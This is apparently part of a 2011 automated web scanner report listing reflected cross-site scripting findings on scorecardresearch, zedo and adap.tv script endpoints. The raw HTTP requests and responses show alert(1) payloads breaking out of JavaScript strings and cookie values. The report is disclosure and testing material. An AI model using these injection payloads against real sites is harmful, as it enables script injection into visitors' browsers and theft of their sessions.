HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:18 GMT Date: Sun, 04 Sep 2011 00:45:18 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ;b--){f=COMSCORE.beacon(a COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"9dc8e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113b1b71<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:17 GMT Date: Sun, 04 Sep 2011 00:45:17 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ction(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113b1b71<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:17 GMT Date: Sun, 04 Sep 2011 00:45:17 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"1369029<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:18 GMT Date: Sun, 04 Sep 2011 00:45:18 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ,f,b;a=a||_comscore;for(b COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473e3c2c<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:18 GMT Date: Sun, 04 Sep 2011 00:45:18 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... omscore;for(b=a.length-1 COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394cfb0a<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:18 GMT Date: Sun, 04 Sep 2011 00:45:18 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ;for(b=a.length-1;b>=0;b- COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"d842d<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:3654a';alert(1)/ Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=94:4:4:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=210 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:33 GMT Content-Length: 970 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='3654a';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=3654a';alert(1)/ if(zzuid=='unknown')zzuid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:90cbc"-alert(1)- Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=92:4:4:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=210 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:33 GMT Content-Length: 1016 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='90cbc"-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=90cbc"-alert(1)- if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.random(); var zzD ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1017 Content-Type: application/x-javascript Set-Cookie: FFad=17:12:9:9:1;expires Set-Cookie: FFcat=0,0,0:305,825,15 ETag: "8710bb37-8952-4aa4e P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=207 Expires: Sun, 04 Sep 2011 01:25:35 GMT Date: Sun, 04 Sep 2011 01:22:08 GMT Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); y10.src='http://r1.zedo var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:609c0'-alert(1)- Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=84:4:4:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=210 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:33 GMT Content-Length: 1074 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='1609e';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=1609e';alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:b2602';alert(1)/ Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=36:9:9:1:1;expires ETag: "cff199-8747-4aa4e78 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=192 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:51 GMT Content-Length: 968 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='b2602';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=b2602';alert(1)/ if(zzuid=='unknown')zzuid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:9b766";alert(1)/ Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=34:9:9:1:1;expires ETag: "cff199-8747-4aa4e78 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=192 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:51 GMT Content-Length: 968 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='9b766";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=9b766";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.random(); var zzDate = new Date(); var zz ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1018 Content-Type: application/x-javascript Set-Cookie: FFad=12:12:9:9:1;expires Set-Cookie: FFcat=0,0,0:305,825,15 ETag: "cff199-8747-4aa4e78 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=207 Expires: Sun, 04 Sep 2011 01:25:35 GMT Date: Sun, 04 Sep 2011 01:22:08 GMT Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); y10.src='http://r1.zedo var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:54f5b;expires Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=26:9:9:1:1;expires ETag: "cff199-8747-4aa4e78 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=192 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:51 GMT Content-Length: 968 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='33515";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=33515";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.random(); var zzDate = new Date(); var zz ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:54f5b;expires Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=28:9:9:1:1;expires ETag: "cff199-8747-4aa4e78 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=192 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:51 GMT Content-Length: 968 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='9627f';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=9627f';alert(1)/ if(zzuid=='unknown')zzuid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cm.npc-mcclatchy |
Path: | /js_1_0/ |
GET /js_1_0/?config Host: cm.npc-mcclatchy.overture Proxy-Connection: keep-alive Referer: http://www.sacbee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BX=228g5ih765ieg&b=3&s=bh |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:20:59 GMT P3P: policyref="http://info Set-Cookie: UserData=02u3hs9yoaL Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 4622 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <base target="_blank"> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... <link rel="stylesheet" href="http://static ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32692 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 33178 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 33245 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32405 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... as=3&key=cinesport ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 33243 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32448 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... height=225&as=3&key ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32466 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32428 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32474 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... s=3&key=cinesport ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32524 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... ories=sports&width=300 ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 33182 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... h=300&isTop=true&height ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
